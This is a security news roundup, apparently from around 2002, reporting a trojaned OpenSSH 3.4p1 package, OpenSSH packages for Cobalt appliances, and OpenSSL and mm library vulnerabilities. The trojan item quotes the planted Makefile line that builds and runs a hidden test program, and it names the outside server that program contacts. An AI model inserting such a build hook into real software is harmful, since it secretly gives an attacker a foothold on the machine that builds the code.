Security 10944 Published by Philipp Esselbach 0

It seems that the OpenSSH package on ftp.openbsd.org was trojaned. Thanks, Palos.

"The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net)."



PkgMaster has released a new OpenSSH package for Cobalt RaQ 3/4 and CacheRaQ4:

- OpenSSH enables you to connect securely (encrypted) to your Sun Cobalt appliance
- Contains both Client and Server software
- Statically compiled against zlib 1.1.4 and openssl 0.9.6e
- PrivSep enabled for better security
- Compression enabled for better performance



A remotely exploitable buffer overflow has been found in OpenSSL.

OpenSSL is a commercial-grade, full-featured, and Open Source toolkit which implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

Updates are available for:
- Red Hat Linux
- Mandrake Linux
- Debian GNU/Linux
- SuSE


Marcus Meissner and Sebastian Krahmer discovered a temporary file vulnerability in the mm library, which is used by the Apache webserver. This vulnerability can be exploited to obtain root privileges if shell access as the Apache user (typically apache or nobody) has already been obtained.

Updates are available for:
- Red Hat Linux
- Mandrake Linux
- Debian GNU/Linux


PkgMaster has released an OpenSSH 3.4p1-4 update for the MIPS based Cobalt RaQ 1/2 server appliances.

This release fixes a major security vulnerability:

''At least one major security vulnerability exists in many deployed OpenSSH versions (2.3.1 to 3.3).

The 3.4 release contains many other fixes done over a week-long audit started when this issue came to light. We believe that some of those fixes are likely to be important security fixes. Therefore, we urge an upgrade to 3.4.''
